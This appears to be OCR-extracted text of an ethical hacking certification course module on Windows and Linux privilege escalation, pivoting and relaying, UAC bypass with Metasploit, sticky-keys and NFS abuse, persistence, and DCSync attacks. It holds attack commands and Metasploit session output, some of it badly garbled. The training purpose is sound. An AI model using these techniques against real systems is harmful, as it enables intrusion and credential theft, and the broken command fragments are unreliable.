Module 06 Page 685
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Return-Oriented Programming (ROP) Attack T]_
Return-oriented programming (ROP) is an exploitation technique used by attackers to execute arbitrary malicious code An attacker hijacks the target program control flow
a access to the call stack and then executes by gaining By " " " arbitrary machine instructions by reusing available
MOV
XO, gadgetA.
libraries known as gadgets
mf
Gadgets are a collection of instructions that end with
libFunca ()
the x86 RET instruction
¥
Code maliciousfunc () a2 Push addr_gadgetc —gadgetct) Push addr_gadgetB()
The attacker selects a chain of existing gadgets to create a new program and executes it with malicious intentions ROP attacks are very effective as they utilize available and legal code libraries, which are not identified by
security protections such as code signing and
Library
a Call gadget A
Pop LR
RET
PowerUp.ps
-> PowerUp
Windows [Version 10.0.22000.469] osoft Corporation. All rights reserved
rs\Admin\DownLoads
ExecutionPolicy Byp
xecutionPolic
Command ".
\PowerUp
.\PowerUp.ps1;Invoke-AllChecks
AbuseFunction Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable Modifiable =PATH®s .dLL
‘al Group
Servi Service Service Service Service Service Service Service Hijacks
with
Files Fi Fi Files
oke-WScriptUACBy;
s s s
Command
a iceBi Name 'edgeupc stall-ServiceBinary -Name ‘edgeupdate all-ServiceBinary -Name 'edgeupda Instal iceBinary -Name 'edgeupda Install-ServiceBinary -Name 'gupdate Install-ServiceBinary -Name ‘gupdate Install-ServiceBinary -Name 'gupdatem Install-ServiceBinary -Name 'gupdatem Write-HijackDLL -DLUPath ‘C:\Users\Ad
Figure 6.101: Screenshot of Metasploit showing execution of PowerSploit to detect unquoted service paths =
Service Object Permissions
A misconfigured service permission may allow an attacker to modify or reconfigure the attributes associated with that service. This may even lead to changing the location of the application binary to a malicious executable created by the attacker. By exploiting such services, attackers can even add new users to the local administrator group in the system. Attackers then hijack the new account to elevate their access privileges.
jobe\ARM\1.0\arm AdobeARMservice
eNetworkRestri buseFu
erviceName Path StartName AbuseFunct ion
Figure 6.102: Screenshot of Metasploit showing execution of PowerSploit to detect misconfigured service permissions Module 06 Page 723
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Unattended Installs Unattended installs allow attackers to deploy Windows OSs without the intervention of an administrator. Administrators need to manually clean up the unattended install details stored in the Unattend.xml file. This XML file stores all the information related to the configuration settings set during the installation process and may also include sensitive information such as the configuration of local accounts, usernames, and even decoded passwords. In Windows systems, the Unattend.xml file is stored in one of the following locations: C:\Windows
\Panther\
C:\Windows \Panther\
UnattendGC\
C: \Windows\System32\ Cc: \Windows\System32\sysprep\
If attackers can gain access to this file, then they can easily obtain credential information and configuration settings used during the installation of that service or application. Attackers use this information to escalate privileges.
[*]
Checking
UnattendPath
for
unattended
install
files...
:
\Windows\Panther\Unattend.
xml
Figure 6.103: Screenshot of Metasploit showing execution of PowerSploit to detect unattended installs
Module 06 Page 724
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Pivoting and Relaying to Hack External Machines
CE H
|@ Attackers use the pivoting technique to compromise a system, gain remote shell access on it, and further bypass the firewallto pivot via the compromised system to access other vulnerable systems in the network @
Attackers use the relaying technique to access resources present on other systems via the compromised system such
a way that the requests to access the resources are coming from the initially compromised system
Pivoting
oe
Relaying 7
Client2
right © by
Pivoting and Relaying to Hack External Machines (Cont’d) @
Discover live hosts in the network
Pivoting
©
@ @©
CE H
Set up routing rules
Exploit vulnerable services
scan ports of live systems
Al Rights Reserved. Reproduction i tricty Prohibited.
Module 06 Page 725
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Pivoting and Relaying to Hack External Machines (Cont’d)
CE H
Relaying
1. Set up port forwarding rules
|
@ Attackers can browse the http server running on the target
system using the following URL:
2. Access the system resources
http://localhost:
10080
a Attackers can access the SSH server running on the target system by executing the following command: # ssh myadmin@localhost Copyright © by
Al Rights Reserved Reproduction i
Pivoting and Relaying to Hack External Machines Pivoting and relaying are the techniques used to find detailed information about the target network. These techniques are performed after successfully compromising a target system. The compromised system is used to penetrate the target network to access other systems and resources that are otherwise inaccessible from the attacking network. In the pivoting technique, only the systems accessible through the compromised systems are exploited, whereas in the relaying technique, the resources accessible through the compromised system are explored or accessed. Using pivoting, attackers can open a remote shell on the target system tunneled through the initial shell on the compromised system. In relaying, resources present on the other systems are accessed through a tunneled shell session on the compromised system.
Module 06 Page 726
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
The following diagrams illustrate the pivoting and relaying techniques:
Client 2
Using port
forwarding
rules to access
: the system
Client 2
Figure 6.105: Illustration of relaying
Detailed explanation of the pivoting and relaying techniques is as follows: =
Pivoting
In this technique, the first objective of an attacker is to compromise a system to gain a remote shell on it, and further bypass the firewall to pivot through the compromised system and gain access to the other vulnerable systems in the network. Once the system is successfully compromised, a Meterpreter session is established. As the session is pivoted through the compromised system, the target system cannot determine the actual origin of the exploitation.
Module 06 Page 727
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Steps to perform pivoting:
1.
Discover live hosts in the network Once a system is compromised, an ARP scan is performed to discover the list of live systems in the network. For example, an attacker uses the following command target network: >
run
post/windows/gather/arp_scanner
RHOSTS
to detect live hosts in the
Figure 6.106: Screenshot of Metasploit showing results of arp_scanner As shown in the screenshot, the scan results show seven IP addresses reachable from the compromised system. To find out more information about these IP addresses, attackers perform port scanning.
2.
Set up routing rules Prior to using Metasploit to run a port scanner against two IP addresses in the target network, attackers implement routing rules to instruct Metasploit to route all the traffic destined to the private network using the existing Meterpreter session established between the attacker’s system and the compromised system.
For example, an attacker can use the following commands to perform this step: >
background
>
route
add
Routing rule to instruct Metasploit to route any traffic destined to 10.10.10.0 255.255.255.0 to session number 1 (Meterpreter session established with a compromised system)
Module 06 Page 728
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Figure 6.107: Screenshot of Metasploit setting up routing rule 3.
Scan ports of live systems Once the routing rule is implemented,
systems.
port scanning is performed
against the live
For example, the attacker uses the following commands to perform port scanning on the target systems: >
use
auxiliary/scanner/portscan/tcp
>
set
RHOSTS
>
set
PORTS
>
run
As shown
systems.
1-1000
in the
screenshot,
the
result displays
the
open
ports
on the
private
Figure 6.108: Screenshot of Metasploit showing results of port scan 4.
Exploit vulnerable services After the ports are scanned, the vulnerable services running on those ports can be exploited. For example, an attacker Control (UAC) setting.
can
use
BypassUAC
exploit to
bypass
the
User
Access
As shown in the screenshot, a successful session is established to the vulnerable system by pivoting through a compromised system.
Module 06 Page 729
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
exploit (
>
ILHOST => 10.10.1.13 imsf6 exploit (
> set
TARGET Imsf6 exploit( [!]
[!]
set LHOST 10.10.1.13 0
) > [exploit
SESSION
may
r
be
compatible
* missing Meterpreter featur TCP handler on
with
this
module
stdapi_sys proc 10.10.1.13:4444
Default an bypass this setting, continuing guring payload and stager registry keys cuting payload: C:\Windows\s e\cmd.exe
Cleaining
up
/c C:\Windows\System32\ fodhelper. exe
istry
Sending stage (175174 bytes) to 16.10.1.11
(10.10.1.13:4444
M sen)
Bee
meterpreter
TARGET
-> 10.10,1.11:50278)
at
2-84-85 03:59:05
-0400
> J
Figure 6.109: Accessing the target system =
Relaying If the pivoting technique is unsuccessful, attackers use the relaying technique to exploit a vulnerable system in the target network. Attackers use relaying to access resources present on other systems in the target network via the compromised system in such a way that the requests to access the resources come from the initially compromised
system.
Steps to perform relaying: 1.
Set up port forwarding rules The main purpose of port forwarding is to allow a user to reach a specific port ona system that is not present on the same network. The initially compromised system is responsible for allowing direct access to the system, which is otherwise inaccessible from the attacking system. Using a Meterpreter session, a listener can be created using a port number from a list of open ports on the localhost, which links that listener to a port on a remote server. This linking of ports is known as port forwarding. For example, here, the attacker chose port numbers 80, 22, and 445 to set up port forwarding rules. eterpreter
>|portfwd
add
-l
eterpreter
>|portfwd
add
-l
Local TCP}relay created: eterpreter >|portfwd add -l Local TCP|relay created: Local
eterpreter
TCPI
>
relay
created:
10080
-p 80
100445
-p
-r
10.16.1.19
:10080 10.10.1.19:80 10022 -p 22 -r 10.10.1.19 :10022 10.160.1.19:22 :100445
445
-r
10.10.1.19
10.10.1.19:445
Figure 6.110: Applying port forwarding rules Module 06 Page 730
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
2.
Exam 312-50 Certified Ethical Hacker
Access the system resources Once port forwarding has been successful, an attacker can use an appropriate client
program to access the remote resources present on the target system. For example: Attackers can browse following URL:
an
HTTP
server running on the target system
by using the
http: //localhost:10080
Attackers can access an SSH server running on the target system following command: #
Module 06 Page 731
ssh
by executing the
myadmin@localhost
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Privilege Escalation Using Misconfigured NFS @
CE H
Attackers often attemptto enumeratea misconfigured Network File System (NFS) to exploit and gain root-level access to a remote server
|@ Amisconfigured NFS paves the way for attackers to gain root-level access through a regular user account or low-privileged user @
By exploiting NFS vulnerabilities, attackers can sniff sensitive data and files passingthrough the intranet and launch further attacks Check Whether the NFS Service is Running on the Target Host
Establish a Remote Connection with the Target Host Using SSH
Privilege Escalation Using Misconfigured NFS Attackers often attempt to enumerate misconfigurations in the Network File System (NFS) to exploit and gain root-level access to a remote server. NFS is a protocol used to share and access data and files over a secured intranet. It uses port 2049 to provide communication between a client and server through the Remote Procedure Call (RPC). A misconfigured NFS paves the way for attackers to gain root-level access through a regular user account or low-privilege user. By exploiting NFS vulnerabilities, attackers can sniff sensitive data and files passing through the intranet and launch further attacks.
Users accessing files using RPC calls
Users accessing files using RPC calls
Network File System
Attacker Attacker
targets regular users to attain root level
access
Figure 6.111:
Module 06 Page 732
Illustration of NFS exploitation
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Steps Involved in Gaining Root Access of the Target Host: =
Step 1: Run the following nmap command to check whether the NFS service is running on the target host. nmap
-sV
Figure 6.112: Screenshot showing the output of nmap
=
Step 2: Use the following command service: sudo
=
apt-get
install
to install NFS and
interact with the target NFS
nfs-common
Step 3: Run the following command to check if any share is available for mounting on the target host: showmount
-e
Figure 6.113: Screenshot showing the output of showmount
=
Step 4: If the above command returns any mountable named nfs by using the following command: mkdir
=
directories, create a directory
/tmp/nfs
Step 5: Run the following command to mount the nfs directory on the target host. sudo
Module 06 Page 733
mount
-t
nfs
:/
/tmp/nfs
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Step 6: Execute the following commands to view the details of the mounted and obtain the group ownership to the share directory. cd
1s
cp
/bin/bash
.
-la
Step 7: Run the following command host using SSH: ssh
directory
/tmp/nfs
sudo
=
Exam 312-50 Certified Ethical Hacker
-1
to establish a remote connection with the target
Figure 6.114: Screenshot showing the output of showmount
Module 06 Page 734
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Privilege Escalation Using Windows Sticky Keys
CE H
|@ In Windows,the sticky keys feature allows users to use a combination of keys including Ctrl, Alt, and Shift instead of pressing three keys ata time @ After gaining access to a remote system, attackers escalate privileges by simply altering the file associated with the sticky keys feature and pressing the Shift key five times in rapid succession once the system has been booted © Do you want to turn on Sticky Keys? Sticky Kes lets you use the SHIFT, CTRL, ALT, or Windows Logo keys by pesting te tum on Sticky Key isto pres the SHIFT tone key at time, The keybosrd short key Stimes. Dicablethiskeyboard shortcutin Ear of Access keyboard settings
$s Reserved. Reproduction
Privilege Escalation Using Windows Sticky Keys In Windows, the sticky keys feature allows users to use a combination of keys including Ctrl, Alt, and Shift instead of pressing three keys simultaneously. Attackers exploit this feature to perform privilege escalation. After gaining access to a remote system, attackers escalate privileges by simply altering the file associated with the sticky keys feature and pressing the Shift key 5 times in fast succession once the system has been booted. To perform this attack, an attacker must copy the file sethc.exe at the location %systemroot%\system32 to a different location. Next, they must copy cmd.exe to the same location. Now, when the attacker restarts the system and hits the Shift key 5 times, a Command Prompt window opens with system-level access. Further, the attacker can retain backdoor access by simply creating a new local administrator account. ©
Do you want to turn on Sticky Keys? Sticky Keys lets you use the SHIFT, CTRL, ALT, or Windows Logo keys by pressing one key at a time. The keyboard shortcut to turn on Sticky Keys is to press the SHIFT key 5times. Disable this keyboard shortcut in Ease of Access keyboard settings
Yes
No
Figure 6.115: Screenshot of the Windows sticky keys feature
Module 06 Page 735
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
we, A
QR)
Martin
AD
stieta
Figure 6.116: Screenshot showing system-level access in Command Prompt achieved using sticky keys
Module 06 Page 736
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Privilege Escalation by Bypassing User Account Control(UAC)
(CEH
“& When attackers fail to escalate privileges using a simple payload, they attempt to evade Windows security
features such as UAC and to
@
Ina Windows environment, even if the
is set to any option, attackers can abuse a few
Windows applications to escalate privileges without triggering a UAC notification
Techniques to Bypass UAC Using Metasploit Bypassing UAC Protection
Bypassing UAC Protection via Memory Injection
Privilege Escalation by Bypassing User Account Control (UAC) (Cont'd)
Bypassing UAC Protection Through FodHelper Registry Key
C'EH com | se ae
Bypassing UAC ProtectionThrough Eventvws Registry Key
{eremoeerr rarer ary ay
Bypassing UAC Protection via Memory Injection
Privilege Escalation by Bypassing User Account Control (UAC) When attackers fail to escalate privileges using a simple payload, they attempt to evade Windows security features such as UAC and to gain system-level access. To achieve this, attackers first lure the victim into accepting and running a specific file crafted by them. In a Windows environment, even if the UAC protection level is set to any option, attackers can abuse a few Windows applications to escalate privileges without triggering a UAC notification.
Module 06 Page 737
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
Alternatively, attackers may inject malware into a trusted process to gain high-level privileges without any notification to the user. Techniques to Bypass UAC Using Metasploit =
Bypassing UAC Protection
Attackers use the bypassuac Metasploit exploit to bypass UAC security through process injection. It generates another session or shell without a UAC flag. After gaining shell access, attackers execute the getsystem and getuid commands to retrieve the privileges of system authority . msf
>
Windows
use
exploit/windows/local/bypassuac
x86
Imsf6 exploit( LHOST => 10.10.1.13 nsf6 exploit ( ARGET => 0 exploit (
) > set LHOST 10.10.1.13 ) > set TARGET 0
not be compatible with this module * missing Meterpreter features: stdapi_sys proce arted rev TCP handler on 10.10,1.13:4444 UAC is Enab checking le\ rators group! Continuing UAC
can
‘aining up reg tage
bypas
this setting,
and stager 7
continuing
registry
keys
snative\cmd.exe
) to
10.10.1.11
(10.10.1.13:4444
Windows
\System32\ fodhelper. exe
-> 10.10.1.11:50278)
at 2022-04-05 03
5
-0400
Figure 6.117: Screenshot of Metasploit showing UAC protection bypass
Module 06 Page 738
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Bypassing UAC Protection via Memory Injection
The Metasploit exploit bypassuac_injection employs reflective DLL mechanisms to inject only DLL payload binaries. Using this command, attackers can obtain AUTHORITY \SYSTEM privileges. msf
>
use
exploit/windows/local/bypassuac_injection
Backgrounding exploit ( Matching Modules # Name ription
exploit/windows/local/BBBSSMEM windows store UAC Protection B Via Windows St exploit/windows/local/BSESSMEM windows store @ UAC Protection Bypass Via Windows exploit/windows/local /ijieSSUE alate UAC Protection By exploit/windows/local/(MESEmEe alate UAC Protection ploit/windor
filesys 2019-0 set .exe) reg 2019-02-19 set.exe) and Registry 2010-12-31
injection
By
ory
Injectio SxS
manual
Wind)
manual
s 7
Hind
2010-12-31
nd|
2017-04-06
ind|
alate UAC Protection Bypass el abusing WinSXS exploit/windows/local/SBESSUEE_ vbs 2015-0: alate UAC Protection Bypass (ScriptHost Vulnerability)
exploit/wine
ocal/BMBEssueE
comhijack
alate UAC Protection Bypass (Via C exploit/windows/local /@MESSEEE eventvwr
Wind)
Wind!
1900-01-01
Wind
2016-08-15
Ss
Wind)
exploit/windows/local/§SSBUEe sdclt 2017-03-17 alate UAC Protection Bypass (Via Shell Open Registry Key) exploit/windows/local/SJBESSMEE silentcleanup 2019-02-24
s
Wind
alate
alate
UAC
UAC
Pro’
Protection
n
(Via Eventwwr
Bypass
1
Registry
Key)
eanup)
Wind!
Figure 6.118: Screenshot of Metasploit showing UAC Bypass via memory injection
Module 06 Page 739
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Bypassing UAC Protection through FodHelper Registry Key The Metasploit exploit bypassuac_fodhelper hijacks a special key from the HKCU registry hive to bypass the UAC and attaches it to a fodhelper.exe. The custom commands can be invoked when the fodhelper.exe file is executed. msf
>
use
exploit/windows/local/bypassuac_fodhelper
Terminal
>Luse_exploit/windo
ulting to
L/bypassu
windc
erpreter )
exploit (
helper
>[set
session
) >[show
tcp
]
options
Module options (exploit/windows/local/bypassuac_fodhelper) Name
Current Setting
Required
Description
SESSION
1
yes
The
Payload
options
(windows/meterpreter/reverse
Name
Current
EXITFUNC
pr
LHOST LPORT
Setting
10.10.1.13 4444
Required
s
ion
to
run
this
module
on
tcp)
Description Exit technique
The The
listen listen
addre port
(Accepted in
,
interface
seh, thread, may
be
pro
specif
none)
Exploit target: Id
Name
®
Windows
Figure 6.119: Screenshot of Metasploit showing UAC Bypass via FodHelper registry key
=
Bypassing UAC Protection through Eventvwr Registry Key The Metasploit exploit bypassuac_eventvwr also hijacks a special key from the HKCU registry, and custom commands can be executed with the launch of Event Viewer. This exploit manipulates the registry key, but it is wiped once the malicious commands or payloads are invoked. msf
>
Module 06 Page 740
use
exploit/windows/local/bypassuac_eventvwr
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
use exploit/windows/local/bypassuac_even ploit (windows/local/bypassuac_eventvwr) > set sion => 1 exploit (windows /local/bypassuac_eventvwr) > exploit started TCP handler on 192.168.1.106:4444 UAC is Enabled, checking level Part
UAC
of Administrato
i
et
to
ntinuing...
Default
By c this continuing. Configuring payload and stager registry keys . Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Wind: nding to 192.168.1.105 er Ned] (192.168.1.106:4444 -> 192.168.1.105:65227) g up regi
getsystem
via technique 1 (Named Pipe Impersonation
(In Memory/Admin)).
getuid
Figure 6.120: Screenshot of Metasploit showing UAC bypass via the Eventvwr registry key =
Bypassing UAC Protection through COM Handler
jack
The Metasploit exploit bypassuac_comhijack allows attackers to build COM handler registry entries within the current user hive to bypass UAC protection. These registry entries can be referenced to the execution of some high-level processes, which results in the loading of attacker-controlled DLLs. These DLLs can be injected with a malicious payload that allows attackers to establish elevated sessions. msf
>
use
exploit/windows/local/bypassuac_comhijack
exploit/windows bypassuac_comhijack oit (windows/local/bypassuac_comhijack) > set ee it (windows/local/bypassuac_comhijack) > exploit e TCP handler , checking 1 f Administra S group! Continuing et to Defa UAC can byp h tting, continuing
Targeting Computer Managment
via HKCU\Software
d to ¢
aj\AppData\Local\
integrit
CLSID\ {0A2
bqLjiowg.d1l
> 192.168.1.107:49209)
> get
a technique
E
i
onation
(In
Memory/Admin) )
Figure 6.121: Screenshot of Metasploit showing UAC bypass via COM handler hijacking Module 06 Page 741
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Privilege Escalation by Abusing Boot or Logon Initialization Scripts Attackers take advantage of boot or logon initialization scripts for escalating ivileges or maintaining persistence ona
target system
Boot or logon initialization scripts also allow attackers to perform different administrative tasks, using which they can run other programs on the system Logon Scriptip’ gs (Windows)
© Attackers create persistence and escalate privileges on a system by embedding the path to their script in the | following registry key: HKCO\Envi ronment\UserTai tMpriogonscript
Logon Script (Mac) (ac)
© Logon scripts in macOS are also known as login hooks and allow attackers to create persistence on a systemas — | they are executed automatically during system login © Attackers leverage these hooks to inject a malicious payload to elevate privileges and maintain persistence
Network Logon Scripts
RC Scripts Startup Items
© Network logon scripts are allocated using Active Directory or GPOs © Attackers abuse network logon scripts to gain local or administrator credentials based on the access configuration @ Attackers abuse RC scripts by embedding a malicious binary shell or path in RC scripts such as re.common or
| © -etoca1 within Unix-based systems to escalate privileges and maintain persistence @
Attackers create malicious files or folders within the /Library/startupItems
| @ StartupItems items are executed at the bootup stage with root-level privileges
directory to maintain persistence
Privilege Escalation by Abusing Boot or Logon Initialization Scripts Attackers take advantage of boot or logon initialization scripts for escalating privileges or maintaining persistence on a target system. These scripts also allow attackers to perform different administrative tasks, through which they can run other programs on the system. In addition,
attackers
can
communicate
with
an
internal
logging
server
implementing
these
scripts. Such scripts may differ depending on the OS of the target system and the location (remote or local) from which they are executed. Attackers initially use these scripts to hold persistence on a single system. Based on the configuration settings, attackers can escalate privileges either using a local or an admin account. Discussed below are the various techniques initialization scripts for escalating privileges.
used
by
attackers
to
apply
boot
or
logon
Logon Script (Windows) Once a user or a user group is signed into a Windows system, the OS allows the execution of logon scripts. These scripts are used by attackers to create persistence and escalate privileges on a system by embedding the path to their script to the following registry key: o
HKCU\Environment\UserInitMprLogonScript
Logon Script (Mac)
Logon scripts on macOS are also known as login hooks and allow attackers to create persistence on a system as they are executed automatically during the system login. A specific script (login hook) is executed by macOS when a login attempt is made. However, this login hook differs from startup items as the hook itself is executed as the root user. Attackers leverage these hooks to inject malicious payloads to elevate privileges and maintain persistence. Module 06 Page 742
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Network Logon Scripts Attackers leverage network logon scripts for escalating privileges and maintaining persistence. These scripts are allocated using AD or GPOs. Such logon scripts are executed using any valid user’s credentials. The initialization of a network logon script can be utilized for different systems based on the networked systems. For this reason, attackers abuse network logon scripts to gain local or administrator credentials based on the access configuration to escalate their privileges.
=
RC Scripts
Attackers abuse RC scripts to escalate privileges and create persistence during the startup process of Unix-based systems. These scripts are executed during system startup and allow the mapping and initializing of custom startup services. These custom services can be used by an attacker for various run levels. Attackers maintain persistence by embedding a malicious binary shell or path to RC scripts such as rc.common or re.local within Unix-based systems. When the system reboots, attackers gain root access through the automatic execution of these RC scripts. =
Startup Items In macOS systems, startup items run at the last stage of the booting process and include different executable files or shell scripts along with their configuration information, which is used to determine the order of execution for the startup items. StartupParameters.plist is an executable file of a startup item, which is located within the top-level root directory. Attackers create malicious files or folders within the /Library/StartupItems directory to maintain persistence. As these items are executed at the bootup stage, they can be executed with root-level privileges.
Module 06 Page 743
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Privilege Escalation by Modifying Domain Policy
CE H
@ The domain policy comprises the configuration settings that may be implemented between the domainsina forest domain environment @ Attackers modify the domain settings by changing the group policy and trust relationship between domains @
Attackers also implanta fake domain controllerto maintain a foothold and escalate privileges
Group Policy Modification
@
a
Modify the scheduledtasks.xm1
file to createa
_ _
malicious scheduled task/job using scripts such as
~
\Machine\Preferences\Scheduled
€=—=9
New-GPOImmediateTask:
Tasks\ScheduledTasks. xml
2
Domain Trust Modification
@ Use the domain trusts
utility to collect
information about trusted domains and modify
_ the settings of existing domain trusts: C: \Windows \system32>nltest
ole
/domain_trusts
_ _
Privilege Escalation by Modifying Domain Policy Attackers often attempt to circumvent security solutions and other defenses implemented in a domain environment by modifying the domain’s configuration settings. In a Windows environment, domains controlled by the AD service manage the communications between various resources such as computers and user accounts in a network. The domain policy comprises the configuration settings that may be implemented between the domains in a forest domain environment. Attackers can modify the domain settings by changing the group policy and trust relationship between domains. Attackers make these changes to implant a fake domain controller (DC), through which they can maintain a foothold and escalate privileges. =
Group Policy Modification
Group policies are used to manage the resources and their configuration settings such as security options, registry keys, and domain members. All user accounts are provided with read access to GPOs by default, and write access is provided only to specific users or groups within the domain. \\SYSVOL\\Policies\
Attackers use the above path to access the domain group policies and modify them to perform unintended activities such as creating a new account, disabling or modifying internal tools, ingress tool transfer, unwanted service executions, and modifying the policy to extract passwords in plaintext. \Machine\ Preferences \ScheduledTasks\ScheduledTasks
. xml
Attackers use the above path to modify the ScheduledTasks.xml file to create a malicious scheduled task/job using scripts such as New-GPOImmediateTask. \MACHINE\Microsoft\Windows
Module 06 Page 744
NT\SecEdit\GptTmpl.inf
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Attackers use the above path to modify particular user rights such as SeEnableDelegationPrivilege to create a backdoor. Then, attackers control the user account to change the group policy settings. =
Domain Trust Modification Domain trust objects provide information such as credentials, accounts, authentication, and authorization mechanisms used by domains. c:\Windows\system32>nltest
/domain_trusts
Attackers use the above utility to collect information about trust domains and use the gathered information to add a domain trust or modify the settings of existing domain trusts to escalate privileges through Kerberoasting and pass-the-ticket attacks.
Module 06 Page 745
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Retrieving Password Hashes of Other Domain Controllers Using DCSync Attack @
Ina DCSyncattack, an attacker initially compromises and obtains privileged account access with domain replication
rights and activates replication protocolsto create a virtual
domain controller (DC) similarto the originalAD ‘@
Itallows an attacker to send requests to the DC, retrieve
@
Attackers leverage mimikatzto perform DCSyncattack
mimikatz
cE H onl
mimikatz includes a DCSync command that | utilizes MS-DRSRto replicate the behavior of a legitimate DC
administrator NTLM password hashes,and perform further attacks such as golden ticket attacks, account manipulation, and living-off-the-land attacks
Domain Controller
(Server)
pright © by
Tttps//othub com Al Rights Reserved Reproduction i
Retrieving Password Hashes of Other Domain Controllers Using DCSync Attack A domain controller (DC) in a Windows environment is configured to securely validate user requests within a domain. The function of a DC is to stockpile user accounts and data, provide authentication, and append a security policy for the domain. Replicating a directory in the IT environment plays a vital role as it assists system administrators to organize and handle data flow across many DCs. For example, when an employee of an organization updates their account credentials, the updated credentials should be replicated across all the DCs, which can facilitate easy authentication for users. The DCSync attack is a technique used by attackers on selective DCs. In this attack, an attacker initially compromises and obtains privileged account access with domain replication rights. Then, they activate replication protocols to create a virtual DC similar to the original AD. This access enables the attacker to send requests to the DC and receive the victim’s confidential information such as NTLM password hashes. Using this information, an attacker can launch further attacks such as golden ticket attacks, account manipulation, and living off the land (LOTL) attacks as well as embed ransomware in the compromised servers. DCSync Attack Stages The DCSync attack is performed in the following eight stages, which start from lower privileges and proceed to higher privileges.
=
Stage 1: Performs external reconnaissance
=
Stage 2: Compromises the targeted machine
=
Stage 3: Performs internal reconnaissance
=
Stage 4: Escalates local privileges
Module 06 Page 746
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking =
Stage 5: Compromises credentials by sending commands to DC
=
Stage 6: Performs admin-level reconnaissance
=
Stage 7: Performs malicious remote code execution
=
Stage 8: Gains domain admin credentials rt Reconnaissance
Attacker External
Reconnaissance
* we
Internal
Compromised
ig Reconnaissance
Machine
|
ne scalation
Figure 6.122: Stages of the DCSync attack
Access Rights Required for Performing DCSync Attack Initially, when attackers obtain privileged account access through other means of attack, they have limited access rights to the domain resources. These access rights are insufficient for attackers to perform a DCSync attack. Hence, they require more time to gain additional permissions to perform a DCSyn attack. After obtaining additional permissions or higher privileges, attackers can perform the following activities: =
Replicating Directory Changes
=
Replicating Directory Changes All
=
Replicating Directory Changes in Filtered Set
How Attackers Compromise the Domain Controller (DC) =
An attacker initially identifies the DC to compromise and requests for replication.
=
The attacker either deploys tools such as mimikatz to replicate the DC and request multiple DCs to replicate the information or sends a GetNCChanges command as a request for replication of information on the DC.
=
Now, the DC accepts the request, acknowledges the replication request, and hands over password hashes to the attacker. Attacker
disco
Requests rep!
Domain Controller (Server)
